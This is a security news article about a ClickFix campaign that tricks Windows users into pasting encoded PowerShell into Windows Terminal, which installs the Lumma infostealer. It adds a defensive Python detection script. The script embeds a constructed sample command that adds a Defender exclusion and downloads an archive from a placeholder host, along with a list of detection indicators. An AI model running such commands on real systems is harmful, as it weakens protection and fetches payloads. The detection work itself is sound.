A new ClickFix campaign is tricking Windows users into launching Windows Terminal and pasting malware that deploys the Lumma infostealer, bypassing security tools by using legitimate administrative software.
Microsoft Threat Intelligence has identified a new variation of the ClickFix scam that's actively targeting Windows users, employing a clever twist on the classic social engineering tactic to distribute the Lumma infostealer malware.
How the scam works
The campaign, which surfaced in February 2026, modifies the traditional ClickFix playbook to evade detection. While previous versions tricked victims into using the Windows Run dialog (Win + R) to paste malicious commands, this new iteration directs users to press Windows + X → I, which launches Windows Terminal.
This subtle change is significant because Windows Terminal is a legitimate administrative tool commonly used by developers and IT professionals. Security tools have become adept at flagging suspicious activity from the Run dialog, but Windows Terminal's everyday use makes malicious activity harder to detect.
The social engineering trap
Victims encounter a web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page instructs them to copy a command and paste it into Windows Terminal, typically framed as something harmless like verifying their connection or fixing an error.
What users actually paste is a heavily encoded PowerShell command that initiates a complex attack chain. In one version, the command unpacks itself and downloads a renamed copy of the 7-Zip archive utility along with a compressed payload. The archive tool then extracts additional components that establish persistence, modify Microsoft Defender exclusions, and begin collecting system and browser data.
The final payload
The attack culminates in deploying Lumma Stealer, a common infostealer that injects itself into Chrome and Edge processes to harvest stored login credentials and other browser data. This malware has become increasingly prevalent in recent months, with attackers leveraging various distribution methods to reach victims.
Alternative infection path
A second infection route uses a similarly encoded command to fetch a batch script that drops a VBScript file. This script executes using built-in Windows utilities, including MSBuild, and employs a technique called "EtherHiding" that leverages cryptocurrency blockchain infrastructure before launching the credential-harvesting routine.
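As an added defender-side example that is not part of the Microsoft report or this article: a small Python triage script run over constructed process-creation events (Sysmon Event ID 1 style fields) that covers both infection paths described above. It flags an encoded PowerShell command line whose parent is Windows Terminal, decodes the base64 UTF-16LE payload to look for Defender-exclusion and download cmdlets, and separately flags MSBuild.exe launched from a script host. The event field names, the `WindowsTerminal.exe` parent image name, the sample paths and command lines, and the indicator list are all assumptions constructed for this example; the encoded sample is built from a harmless stand-in string, not the campaign's actual command.

```python
import base64
import binascii
import re


def _encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the kind of script the article describes: it touches
# Defender exclusions and fetches an archive. The host is a reserved test domain.
SAMPLE_SCRIPT = (
    "Add-MpPreference -ExclusionPath C:\\Users\\Public; "
    "Invoke-WebRequest http://example.invalid/pkg.7z -OutFile C:\\Users\\Public\\pkg.7z"
)
ENCODED = _encode_powershell(SAMPLE_SCRIPT)

# Constructed sample events (assumed field names, modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {   # benign: an admin running a plain script from Windows Terminal
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
        "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
    {   # suspicious: encoded command pasted into Windows Terminal
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
        "command_line": f"powershell.exe -NoProfile -EncodedCommand {ENCODED}",
    },
    {   # suspicious: MSBuild spawned by the VBScript host
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "parent_image": r"C:\Windows\System32\wscript.exe",
        "command_line": r"MSBuild.exe C:\Users\Public\build.xml",
    },
    {   # benign: MSBuild spawned by Visual Studio
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "parent_image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
        "command_line": r"MSBuild.exe C:\src\app.sln",
    },
]

# Assumption: the shell launched by Windows Terminal shows this parent image name.
TERMINAL_HOSTS = {"windowsterminal.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Matches -e, -ec, -en, -enc ... -EncodedCommand (PowerShell accepts the prefixes)
# while not matching -ExecutionPolicy; captures the base64 argument that follows.
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")

# Indicators worth a closer look once the payload is decoded (heuristic list).
DECODED_INDICATORS = (
    "add-mppreference", "exclusionpath", "invoke-webrequest",
    "downloadfile", "downloadstring", "frombase64string",
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded script text, or None if there is no valid encoded argument."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(event: dict) -> list:
    """Apply both rules to one event and return human-readable findings."""
    findings = []
    image, parent = basename(event["image"]), basename(event["parent_image"])
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(event["command_line"])
        if decoded is not None:
            if parent in TERMINAL_HOSTS:
                findings.append("encoded PowerShell launched from Windows Terminal")
            else:
                findings.append("encoded PowerShell command line")
            hits = [k for k in DECODED_INDICATORS if k in decoded.lower()]
            if hits:
                findings.append("decoded script references: " + ", ".join(hits))
    if image == "msbuild.exe" and parent in SCRIPT_HOSTS:
        findings.append(f"MSBuild launched from script host {parent}")
    return findings


def scan(events: list) -> list:
    """Return (index, findings) for every event that triggered at least one rule."""
    return [(i, f) for i, f in enumerate(map(analyze, events)) if f]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, "; ".join(findings))
```

Run as a script it prints the two flagged events. In a SIEM the same two rules map directly onto process-creation telemetry with parent and child image names and command lines; the indicator list needs tuning per environment, since `Add-MpPreference` typed into Windows Terminal is also what a legitimate administrator does, and the parent-process rule is what separates a pasted ClickFix command from the Run-dialog variants the article contrasts it with.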
Why this matters
ClickFix campaigns have been circulating for over a year, largely because they exploit the reliable tactic of persuading users to run malicious commands themselves. By disguising instructions as routine verification steps, attackers bypass many traditional security measures.
Microsoft's findings suggest scammers are continuously adapting their methods to stay ahead of security tools. The use of Windows Terminal represents a calculated move to blend malicious activity with legitimate system administration, betting that users will assume commands running in a legitimate terminal window are safe.
Protection recommendations
To protect against these attacks, users should:
- Be extremely cautious about copying and pasting commands from websites, especially those claiming to be verification or troubleshooting steps
- Verify the legitimacy of any technical instructions before executing them
- Keep security software updated and enable real-time protection
- Consider using application allowlisting to prevent unauthorized software execution
The campaign demonstrates how attackers continue to refine social engineering tactics, finding new ways to exploit user trust and legitimate system tools to distribute malware. As these techniques evolve, user awareness remains one of the most critical defenses against such attacks.

